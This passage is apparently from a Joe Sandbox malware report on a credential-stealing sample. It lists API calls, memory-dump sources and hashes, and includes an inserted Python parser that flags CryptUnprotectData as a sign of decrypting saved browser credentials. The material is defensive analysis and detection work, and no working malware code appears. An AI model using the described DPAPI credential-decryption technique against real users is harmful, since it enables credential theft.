                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 0bdde3f23229ef417fa52ac29440106b36f0e3adec1e038659994c1651ac8fd0
                            • Instruction ID: 8bca185a8874a4704f309fa80a3aeb4c7df1a59f7ca5d4bda89137d9fbfcbc47
                            • Opcode Fuzzy Hash: 0bdde3f23229ef417fa52ac29440106b36f0e3adec1e038659994c1651ac8fd0
                            • Instruction Fuzzy Hash: 2741F975A40A289FDB24DB54CC95F9BB7B5BB48702F4041C8E608E72D0D775AE85CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F3A2D4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F3A2F3
                            • LocalFree.KERNEL32(?), ref: 00F3A323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: e793778b72026da52b98086e4028876dc2a59dc4fdd295286679185b03ef7d3f
                            • Instruction ID: 3c15155630671a72c0f4a7581c5fbde7c5f5f584b382e807d0088c9ef70f35a6
                            • Opcode Fuzzy Hash: e793778b72026da52b98086e4028876dc2a59dc4fdd295286679185b03ef7d3f
                            • Instruction Fuzzy Hash: 8911FAB4A00209EFCB05DFA4D889AAEB7B5FF88300F108559ED5597384D730AE51CFA1
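The function records in this report follow a fixed layout: the API calls with their call-site addresses, the dump the code was carved from with its image base under Offset, the API and string ID pairs, and the opcode and instruction fuzzy hashes. That makes them easy to parse for triage. The following Python is an added example, not part of the Joe Sandbox report or of Joe Security's tooling; the excerpt embedded in it is constructed from two records on this page (the CoCreateInstance/MultiByteToWideChar record and the CryptUnprotectData record) with their Associated lists trimmed, and the `FunctionRecord` class, the field names and the DPAPI flagging rule are this example's own choices. It rebases each `ref:` address against the record's Offset to give an RVA that survives ASLR, and flags records whose API set includes CryptUnprotectData, the DPAPI call needed to decrypt credentials that Chromium-based browsers protect with the user's DPAPI master key.

```python
"""Parse Joe Sandbox function-analysis records into structured data and flag DPAPI use.

Added example; not part of the Joe Sandbox report. SAMPLE is a constructed excerpt
of two records from this report with their Associated lists trimmed.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
• CoCreateInstance.COMBASE(00F4E120,00000000,00000001,00F4E110,00000000), ref: 00F439A8
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F43A00
Memory Dump Source
• Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f30000_file.jbxd
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID:
• API String ID: 123533781-0
• Opcode ID: 0bdde3f23229ef417fa52ac29440106b36f0e3adec1e038659994c1651ac8fd0
• Instruction Fuzzy Hash: 2741F975A40A289FDB24DB54CC95F9BB7B5BB48702F4041C8E608E72D0D775AE85CF50
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F3A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00F3A2F3
• LocalFree.KERNEL32(?), ref: 00F3A323
Memory Dump Source
• Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
• Opcode ID: e793778b72026da52b98086e4028876dc2a59dc4fdd295286679185b03ef7d3f
• Instruction Fuzzy Hash: 8911FAB4A00209EFCB05DFA4D889AAEB7B5FF88300F108559ED5597384D730AE51CFA1
"""

# "• Name.MODULE(arg,arg,...), ref: ADDR" as emitted by the Joe Sandbox IDA plugin.
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# APIs whose presence in an unsigned sample is worth a second look: DPAPI unwrapping
# of saved credentials. This set is the example's own choice, not a Joe Sandbox rule.
DPAPI_APIS = {"CryptUnprotectData", "CryptProtectData"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # dicts: name, module, args, ref (int)
    fields: dict = field(default_factory=dict)  # API ID, String ID, Opcode ID, ...
    dump: Optional[str] = None
    image_base: Optional[int] = None            # from "Offset:" on the Source File line

    def rvas(self):
        """Call-site addresses rebased against the image base the dump was loaded at."""
        return [a["ref"] - self.image_base for a in self.apis]

    def api_sequence(self):
        return ">".join(a["name"] for a in self.apis)


def parse_records(text):
    """Split the report text into records; each opens with an 'APIs' or 'Strings' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers such as "Memory Dump Source" carry no data
        m = API_RE.match(line)
        if m:
            args = [a for a in m["args"].split(",") if a]  # "?" marks an unresolved argument
            cur.apis.append({"name": m["name"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)})
            continue
        m = SRC_RE.match(line)
        if m:
            cur.dump, cur.image_base = m["dump"], int(m["offset"], 16)
            continue
        m = FIELD_RE.match(line)
        if m and m["key"] != "Associated":
            cur.fields[m["key"]] = m["val"]
    return records


def dpapi_records(records):
    """Records whose API set touches DPAPI; the call sequence and RVA give a pivot for IDA."""
    return [r for r in records if any(a["name"] in DPAPI_APIS for a in r.apis)]


if __name__ == "__main__":
    for r in dpapi_records(parse_records(SAMPLE)):
        print(r.api_sequence(), [hex(x) for x in r.rvas()], r.fields["Instruction Fuzzy Hash"])
```

The RVAs rather than the raw `ref:` addresses are what to carry into the snapshot file or the unpacked PE, since the sample was loaded at 00F30000 in this run and will not be elsewhere; the instruction fuzzy hash of the flagged record is the value to compare against other Stealc dumps.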
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?$__ZN
                            • API String ID: 0-1427190319
                            • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction ID: e2c49ebc3448ccff4c2de82641729db8ddb8b7a19fd7b8bd07307e640e667146
                            • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                            • Instruction Fuzzy Hash: 967214F2908B109FD714CF14C89076AB7E2BFD6720F598A1DF8A59B291D370EC41AB81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: xn--
                            • API String ID: 0-2826155999
                            • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction ID: 0b10af9c1e0fd227eefa4a5b7d1e84f4095fec7e89ccce0e3b33fb9309730e8a
                            • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                            • Instruction Fuzzy Hash: 4CA236B2C002688BEF18EB54C8907FDB7B1FF45310F1842AAD556BB281D7399E85EB51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: s}o
                            • API String ID: 0-980724749
                            • Opcode ID: ee8f2e4c341e3c9264ac886a140c7b9c9f7e968db0575321fa033c9629b40c4f
                            • Instruction ID: 29f8ae2394af7d009702333b579c8eead496847e03a102feffcdce270261455d
                            • Opcode Fuzzy Hash: ee8f2e4c341e3c9264ac886a140c7b9c9f7e968db0575321fa033c9629b40c4f
                            • Instruction Fuzzy Hash: 6852E4B360C3009FE304AE2DEC8567ABBE9EF94720F16893DE6C487744EA7558058797
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                            • Instruction ID: 9ffd6fb87c07074b085861df7cc24184fa69a9e0f1ab27a553a3c4fabf56494b
                            • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                            • Instruction Fuzzy Hash: 33E1F431A087529FC724EF28C8807EEB7E2EFC9300F55492DE5D997291D731A845EB82
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                            • Instruction ID: 3614527cff7ecb35cc491c72b9ea86f0b9ab53e0f8661ccce40d47ddca865b7a
                            • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                            • Instruction Fuzzy Hash: 1DE1B532A083129FCB24EE18C8817EEB7E6EFC5314F15892DE9999B251D730EC45DB46
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: UNC\
                            • API String ID: 0-505053535
                            • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                            • Instruction ID: ba80917088348af0a0a8b0d81c8a5ab1e66ad19095672eb4a2dd45fa04b501d6
                            • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                            • Instruction Fuzzy Hash: B2E14B71D042658EFF11CF19C8847BEBFE2AB85324F198169C4A45B292D7358D46EB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: zZ]9
                            • API String ID: 0-352165779
                            • Opcode ID: 1f119482b9a6bfa9056d67ff2ea81575176cc42290a13f4969428979d7d03b31
                            • Instruction ID: 0386a5c1740a6a2723a1832fa68262dbaed9027e73c9586d37d91599f417dc6e
                            • Opcode Fuzzy Hash: 1f119482b9a6bfa9056d67ff2ea81575176cc42290a13f4969428979d7d03b31
                            • Instruction Fuzzy Hash: 767156F3E186009BF3046E3CDC8573AB7D6EB94320F2A453DDA84D7784E5796C098686
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: IAwy
                            • API String ID: 0-4289137141
                            • Opcode ID: 20f2097dad879ecfb95b597c3dd2d6c97122aa4fa6a81b3bf454f3e2e629c9f7
                            • Instruction ID: e7b507610cef7435f0d88e4acd441453bf2267c6f5133c40fcd26d65e5d8036a
                            • Opcode Fuzzy Hash: 20f2097dad879ecfb95b597c3dd2d6c97122aa4fa6a81b3bf454f3e2e629c9f7
                            • Instruction Fuzzy Hash: C96138B3A092019BF3145D3EDC8476ABBDAEFD4320F2A853DD698C77C0D97988458686
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: u{u
                            • API String ID: 0-614104030
                            • Opcode ID: f6bcbb30183433ef93c2b26cd19ca6e40ec1cff4f824947404b0e7e4ace7889d
                            • Instruction ID: 1422a77cb84d18f51fb53188e0048cb34ff3dd5fe00d423e9bf45ed88ed9be02
                            • Opcode Fuzzy Hash: f6bcbb30183433ef93c2b26cd19ca6e40ec1cff4f824947404b0e7e4ace7889d
                            • Instruction Fuzzy Hash: A75146F3A083045BE304AE69EC84736B7DAEBA4710F1A493DDAC4C3344E97958058656
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
